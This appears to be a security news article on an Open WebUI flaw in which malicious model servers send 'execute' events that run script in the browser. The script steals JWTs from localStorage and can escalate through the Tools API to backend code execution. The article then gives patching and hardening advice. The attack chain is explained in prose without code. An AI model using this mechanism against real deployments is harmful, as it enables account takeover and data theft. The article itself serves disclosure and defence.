The exploit enables full account takeover and potential RCE, exposing sensitive AI workloads and internal infrastructure. Prompt remediation is critical to prevent data breaches and supply‑chain attacks on AI services.
Open WebUI has become a popular choice for organizations seeking to host their own large‑language‑model front‑ends, offering a free‑tier interface that mimics commercial AI platforms. Its Direct Connections capability was designed to let users point the UI at any OpenAI‑compatible endpoint, a convenience that quickly turned into a liability when researchers discovered that server‑sent events (SSE) were processed without proper validation. This design decision reflects a broader industry trend: accelerating AI adoption often outpaces rigorous security reviews, especially for plug‑in architectures that expose the client to external code.
The vulnerability hinges on the SSE handler’s trust in payloads labeled "execute," which are fed directly into a dynamic JavaScript constructor. When a malicious model server streams such an event, the injected script runs in the browser context, harvesting the JWT stored in localStorage—a token that is long‑lived, cross‑tab, and not flagged HttpOnly. With the stolen token, an attacker can impersonate the user, access chats, documents, and API keys, and, if the compromised account has workspace.tools permissions, push arbitrary Python code through Open WebUI’s Tools API. This chain escalates a client‑side breach into full remote code execution on the backend, opening pathways for persistence, lateral movement, and data exfiltration.
For enterprises, the immediate priority is to upgrade to Open WebUI v0.6.35, which blocks "execute" events from Direct Connections. Beyond patching, organizations should harden authentication by switching to short‑lived, HttpOnly cookies and enforcing a strict Content‑Security‑Policy that disallows dynamic code evaluation. Disabling Direct Connections by default and requiring multi‑factor approval for any external model endpoint further reduces attack surface. The incident underscores the necessity of treating AI integration points as critical supply‑chain components, demanding continuous monitoring, code‑review, and zero‑trust networking principles to safeguard emerging AI workloads.
Comments
Want to join the conversation?
Loading comments...